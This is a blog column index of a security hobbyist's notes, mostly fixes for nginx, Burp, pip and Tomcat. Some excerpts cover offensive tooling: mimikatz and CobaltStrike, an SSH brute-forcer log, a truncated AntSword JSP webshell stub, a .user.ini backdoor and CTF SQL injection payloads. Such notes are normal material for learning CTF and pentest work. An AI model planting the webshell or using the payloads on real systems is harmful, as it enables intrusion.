web
关注
分享
扫一扫
123hello123
小菜鸡一枚
展开
专栏收录文章
- 默认排序
- 最新发布
- 最早发布
- 最多阅读
- 最少阅读
-
libfreetype.so.6: cannot open shared object file: No such file or directory
【代码】./TeamServerImage: error while loading shared libraries: libfreetype.so.6: cannot open shared object file: No such file or directory。原创 2023-01-04 15:01:22 · 4994 阅读 · 1 评论 -
socks5 搭建代理服务
【代码】socks5 搭建代理服务。原创 2022-12-17 20:44:37 · 3538 阅读 · 0 评论 -
编译mimikatz
0x1 下载源码0x2 更改编译平台版本sdk0x3 安装mfc库 打开visual studio installer这些类型都可以选上,多版本的,选最新版本原创 2022-12-05 11:07:49 · 456 阅读 · 0 评论 -
nginx 设置401验证
nginx设置访问账号密码 - 怀里的懒猫 - 博客园原创 2022-12-02 11:11:19 · 3490 阅读 · 0 评论 -
nginx + php 502
Ubuntu20.04 nginx +php 配置 - 简书原创 2022-12-02 01:29:28 · 601 阅读 · 0 评论 -
burp插件编写 java idea
burp插件编写 java idea原创 2022-11-15 10:47:18 · 642 阅读 · 0 评论 -
chrome浏览器 导入burp证书 失败 无法抓包
chrome浏览器 导入burp证书 失败 无法抓包原创 2022-11-10 14:41:52 · 1937 阅读 · 0 评论 -
CobaltStrike VNC 错误 使用VNC报错 Disconnected from server
CobaltStrike VNC 错误 Disconnected from server原创 2022-08-14 02:04:54 · 2769 阅读 · 0 评论 -
SNETCracker.exe 2022/1/26 31:13:29----检查12.26.20.1:SSH登录发生异常!未能加载文件或程序集“ChilkatDotNet4.dll”或它的某一个依赖项
SNETCracker.exe发生错误:2022/5/26 21:13:29----检查120.26.240.21:SSH登录发生异常!未能加载文件或程序集“ChilkatDotNet4.dll”或它的某一个依赖项。找不到指定的模块。解决:安装 vc++ 2010下载链接:https://my.visualstudio.com/Downloads?q=visual%20C%20&pgroup=参考:VC++2010下载教程_asionzz的博客-CSDN博客_v.原创 2022-06-01 20:58:11 · 2669 阅读 · 0 评论 -
安装burp2022 --illegal-access=permit
问题:--illegal-access=permit原因:原创 2022-05-09 00:48:56 · 3664 阅读 · 0 评论 -
浏览器版本过高导致无法访问网站 burpSuiteBrowser
错误:建立安全连接失败连接到 172.24.11.101 时发生错误。对等端使用了不支持的安全协议版本。错误代码:SSL_ERROR_UNSUPPORTED_VERSION 由于不能验证所收到的数据是否可信,无法显示您想要查看的页面。 建议向此网站的管理员反馈这个问题。此网站可能不支持 TLS 1.2 协议,而这是 Firefox 支持的最低版本。详细了解…看来可能是您的网络安全设置造成了此问题。您想还原到默认设置吗?解决:1.低版本浏览器2.b...原创 2022-04-29 16:28:37 · 3625 阅读 · 0 评论 -
linux 非交互式 修改密码 root 用户
前提:仅限root用户,如果是管理员,sudo su 切换到root一、chpasswdecho "username:password" | chpasswd二、passwd 😢😢😢😢😢😢(实验没成功)echo password | passwd --stdin username原创 2022-04-29 13:18:24 · 1039 阅读 · 0 评论 -
pip 更换源 国内源 阿里源
pip config set global.index-url http://mirrors.aliyun.com/pypi/simple/pip config set install.trusted-host mirrors.aliyun.compip config list原创 2022-04-26 22:29:13 · 2444 阅读 · 0 评论 -
tomcat http 404
HTTP状态 404 - 未找到类型 状态报告消息 请求的资源[/demo_6_war_exploded/hello-servlet]不可用描述 源服务器未能找到目标资源的表示或者是不愿公开一个已经存在的资源表示。Apache Tomcat/10.0.20解决办法:1.下载tomcat92.使用jdk1.8以上(环境1.8,会报错,建议使用更高版本)...原创 2022-04-25 11:13:17 · 1146 阅读 · 0 评论 -
pyqt 界面卡顿 解决办法 多线程
跳转链接:PyQt - 使用多线程避免界面卡顿_bailang_zhizun的博客-CSDN博客_pyqt5 界面卡顿原创 2022-04-22 00:44:14 · 1612 阅读 · 1 评论 -
requests 处理SSL证书错误
问题:1020: InsecureRequestWarning: Unverified HTTPS request is being made to host 'www.baidu.com'. Adding certificate verification is strongly advised.requests.exceptions.SSLError: HTTPSConnectionPool(host='120.21.25.21', port=443): Max retries exceeded wi原创 2022-04-16 13:32:28 · 1421 阅读 · 0 评论 -
python request SSL error 403证书错误
requests.exceptions.SSLError: HTTPSConnectionPool(host='xx.xx.xx.xx', port=443): Max retries exceeded with url: / (Caused by SSLError(SSLCertVerificationError(1, '[SSL: CERTIFICATE_VERIFY_FAILED] certificate verify failed: self signed certificate (_ssl.c:1原创 2022-04-11 00:12:33 · 3618 阅读 · 0 评论 -
图片转ico
思路:1. 直接修改文件后缀 (正方形图片)2.使用脚本读取图片,并设置图片大小为(正方形),再保存为ico文件参考链接:Python批量 png转ico - 知乎原创 2022-04-07 16:46:49 · 927 阅读 · 0 评论 -
masscan for windows windows编译masscan
借助老哥的文章:Visual Studio 2019 编译Masscan 真香! - bluedye - 博客园主要有几点:1. 下载vscode,这里推荐2019社区版2.修改配置文件 修改src 下 string_s.h 文件在81行处插入语句:注意 _MSC_VER == 1929 请看这里 --> vs版本对应的编码#elif defined(_MSC_VER) && (_MSC_VER == 1929...原创 2022-03-22 23:01:49 · 2249 阅读 · 0 评论 -
蚁剑jsp一句话木马
参考链接:https://github.com/yzddmr6/JspForAntSword密码为 passwd<%! class U extends ClassLoader { U(ClassLoader c) { super(c); } public Class g(byte[] b) { return super.defineClass(b, 0, b.length)...原创 2021-05-02 22:30:09 · 51118 阅读 · 7 评论 -
编码与解码--数据库编码格式--后端编码格式
1.编码与解码的真谛2. 数据库的编码与后端的编码联系,数据库乱码的处理原创 2021-02-24 23:47:48 · 292 阅读 · 0 评论 -
huaweictf pyer
摸了一天鱼。抓包。经过fuzz测试,发现单引号引发错误闭合单引号。经过多次测试。猜测sql语句:$user = $_post['username'];$password = $_post['password'];$sql = "select password from users where username = '$user' ";$passwd_t =mysql()->query($sql); //伪代码,查...原创 2020-12-21 19:25:03 · 357 阅读 · 2 评论 -
.user.ini 构造后门
原文地址:http://drops.wooyun.org/tips/34240x00 背景这个估计很多同学看了不屑,认为是烂大街的东西了:.htaccess文件构成的PHP后门那么我来个新的吧:.user.ini。它比.htaccess用的更广,不管是nginx/apache/IIS,只要是以fastcgi运行的php都可以用这个方法。我的nginx服务器全部是fpm/fastcgi,我的IIS php5.3以上的全部用的fastcgi/cgi,我win下的apache上也用的fcgi.原创 2020-11-02 11:36:24 · 160 阅读 · 0 评论 -
系统找不到指定的路径。 : AH02291: Cannot access directory ‘D:/xp.cn/www/wwwroot/admin/PhpTest_10006/log/‘ for e
小面板出现这个东西,导致Apache服务器无法启动原因: 站点目录更改,而且把原本的站点文件删除,导致服务器寻找不到站点日志文件,Apache无法启动。办法:原创 2020-10-22 18:53:48 · 1189 阅读 · 0 评论 -
bash 反弹命令的浅分析
大佬的一篇文章,解决了我很久的疑惑。最近真的太懒了,只想当个搬运工。https://www.freebuf.com/articles/system/153986.html原创 2020-10-14 22:06:04 · 146 阅读 · 0 评论 -
buuctf-[RCTF2015]EasySQL
Fuzz 测试过滤: and insert ascii substr left rigth sleep floor < like /**/ %20思路: 注册带有危险符号的用户,登录之后修改密码,就能达到二次注入的效果爆破: admin"or(updatexml('~',concat('~',(),'~'),'~'))or"1 用户: admin"or(updatexml('~',concat('~',database(),'~'),'~'.原创 2020-09-29 21:34:38 · 414 阅读 · 0 评论 -
Invalid Login Credentials
当页面出现nvalid Login Credentials,无法登陆是。请重新修改密码,亲测有效。原创 2020-09-19 15:38:09 · 3351 阅读 · 1 评论 -
极客大挑战--hardsql
select(group_concat(table_name))from(information_schema.tables)where((table_schema)like'geek'))1. updatexml('1',concat('~',database(),'~'),'1')2. updatexml('1',concat('~',(select(select(left(((group_concat(table_name))),25))from(information_sche.原创 2020-09-19 15:04:06 · 123 阅读 · 0 评论 -
如何快速打开python文件 GUI
1. 写bat 文件,就是普通的cmd命令2. 创建bat文件快捷方式到桌面,并且更换图片以及修改运行方式为 "最小化",真的是香。原创 2020-09-19 12:42:04 · 904 阅读 · 0 评论 -
非对称加密原理与欺骗、ca原理
1.非对称加密RSA的原理和欺骗2.CA 浏览器和服务器通过CA系统才能获取对方的public key,这边极大的降低了呗欺骗的可能性。原创 2020-09-18 16:46:10 · 252 阅读 · 1 评论 -
sqli-lab 通过笔记(实时更新)
level 1.level 2:level 3:level 4:level 5:level 6:level 7:level8:level 9:level 10:level 11:原创 2020-09-15 20:39:16 · 258 阅读 · 0 评论 -
session 和 cookie 的理解
cookie 和session 的区别:bai1、cookie数据存放在du客户的浏览器zhi上,session数据放在服务器上。2、cookie不是很安全,dao别人可以分析存放在本地的COOKIE并进行COOKIE欺骗考虑到安全应当使用session。3、session会在一定时间内保存在服务器上。当访问增多,会比较占用你服务器的性能考虑到减轻服务器性能方面,应当使用COOKIE。4、单个cookie保存的数据不能超过4K,很多浏览器都限制一个站点最多保存20个cookie。cookie原创 2020-09-11 17:20:21 · 149 阅读 · 0 评论 -
使用openssl 模拟ca进行证书的申请和颁发,并使用证书部署网站的安全连接访问,即https的加密通信
亲测,已经建立了https链接参考链接:https://blog.csdn.net/guoxiaojie_415/article/details/80554109https://www.cnblogs.com/kezi/articles/11512420.html原创 2020-07-21 10:44:16 · 278 阅读 · 0 评论 -
使用python来理解宽字节注入
宽字节注入无非就是GBK编码。GBK编码中,中文用两个字节表示,英文用一个字节表示当第一个字节大于128,那么系统就会认定这是一个中文字符。原创 2020-06-29 15:42:52 · 322 阅读 · 0 评论 -
.htaccess web php 文件详解
看了一下午的.htaccess 博客,因为年代比较久远,所以真的是很烦很烦。但是也有一些收货吧。得到了一些基本的.htaccess的一些基本命令。如果要用哪条命令,记得去掉注释符号。太难了吧。#<Files ~ ".*">#order allow,deny#deny from all#</Files> #这个是文件夹不可以视#Options -Indexes#这个也是禁止目录访问的#<files ~ "^index.html$">原创 2020-06-03 15:30:12 · 247 阅读 · 0 评论 -
php php3 phtml文件解析
今天看了一到web题目,是关于phtml文件的一个题目。所以好奇去百度了一下这个文件,发现这个文件默认是无法解析的。百度了一波有两种方法。第一种:windows php_study 修改httpd.conf在此处添加但是我的环境报错,还是无法解析。垃圾windows,cao,哈哈哈哈第二种:使用 .htaccess 文件,但是百度了一波,没找到啥有用的东西。解决办法:使用linux(我的是kali2018)修改 /etc/apach...原创 2020-06-03 12:06:07 · 3949 阅读 · 0 评论 -
php 文件读取的骚姿势,你了解多少
https://www.cnblogs.com/BuFFERer/p/12274573.html嘿嘿嘿,我又来搬运了。原创 2020-05-05 23:51:38 · 269 阅读 · 0 评论 -
burpsuite 渲染模式
原创 2020-04-28 12:10:56 · 1846 阅读 · 1 评论 -
Windows系统如何扩展存盘
对于小白来讲,磁盘的分配要合理,不然就会带来很多问题。比如c盘满了,导致系统运行缓慢?怎么办?c盘是系统文件夹,直接删除文件会系统出错和文件缺失,重装系统是一个噩梦。解决方法:1.2.这样子就可以了。...原创 2020-04-16 21:25:34 · 210 阅读 · 0 评论 -
浏览器的网络设置的细微之处
网络设置的话,1.不使用代理:就是说物理机与服务器直接相连2.自动检测:就是浏览器帮你检测有没有代理服务器,有的话就自动帮你选择。3.使用系统代理服务器: 一般就是些软件开启的比较隐蔽的代理功能,它不需要你选定端口4.手动的话:就是自己选择代理服务器,可以选择远程的服务器,也可以选择局域网内的服务器。一般来说这个用做抓包。...原创 2020-04-16 20:23:06 · 237 阅读 · 0 评论